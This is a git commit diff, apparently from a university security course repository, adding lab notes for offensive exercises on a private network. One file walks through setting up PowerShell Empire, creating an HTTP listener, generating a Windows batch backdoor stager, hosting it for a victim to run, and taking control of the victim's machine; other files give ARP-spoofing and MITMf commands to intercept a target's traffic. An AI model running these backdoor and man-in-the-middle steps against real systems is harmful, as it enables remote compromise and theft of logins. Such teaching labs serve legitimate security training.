mirror of
https://github.com/frankwxu/Ubalt.git
synced 2026-02-21 11:17:56 +00:00
add MITM
This commit is contained in:
@@ -0,0 +1,42 @@
|
||||
mkdir /var/www/html/empire_backdoor/
|
||||
mkdir empire_lab
|
||||
cd empire_lab
|
||||
git clone https://github.com/EmpireProject/Empire.git
|
||||
cd Empire/setup
|
||||
./install.sh
|
||||
cd ..exit
|
||||
./empire
|
||||
|
||||
//create a listener
|
||||
listeners
|
||||
(optional) uselistener back<tab><tab>
|
||||
uselistener http
|
||||
(optional) info
|
||||
set Port 8081
|
||||
set Host http:://10.0.2.10:8081
|
||||
execute
|
||||
back
|
||||
list //list listener
|
||||
|
||||
|
||||
//create a backdoor for Windows, we need to know how to communicate with Windows Powershell securly (stager)
|
||||
back //back to top level
|
||||
//(optional): usestager
|
||||
usestager windows/launcher_bat
|
||||
set Listener http
|
||||
set OutFile /var/www/html/empire_backdoor/emipire_http_8081.bat
|
||||
execute
|
||||
|
||||
|
||||
Victim download the backdoor payload from the website (Window machine)
|
||||
service apache2 start (Kali start the website)
|
||||
(Window 10: open IE)
|
||||
10.0.2.7/empire_backdoor
|
||||
(click the rev_https_8080.exe and run anyway)
|
||||
|
||||
//Access to victim's computer
|
||||
agents
|
||||
interact <name of the victim's computer>
|
||||
sysinfo
|
||||
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,8 @@
|
||||
arp -a //router's ip
|
||||
|
||||
echo 1 > /proc/sys/net/ipv4/ip_forward //forward victim's request to router
|
||||
arpspoof -i eth0 -t 10.0.2.1 10.0.2.15 //attacker tells router that I am the victim
|
||||
arpspoof -i eth0 -t 10.0.2.15 10.0.2.1 //ttacker tells victim that I am the router
|
||||
|
||||
https://www.irongeek.com/i.php?page=security/arpspoof
|
||||
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
|
||||
Binary file not shown.
@@ -0,0 +1,12 @@
|
||||
arp -a //router's ip
|
||||
|
||||
//install mitmf
|
||||
apt-get update
|
||||
apt-get install mitmf -y
|
||||
|
||||
//attack
|
||||
mitmf --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0 -hsts
|
||||
|
||||
//Website
|
||||
http://www.stealmylogin.com/demo.html
|
||||
http://w3schools.invisionzone.com/
|
||||
Binary file not shown.
Reference in New Issue
Block a user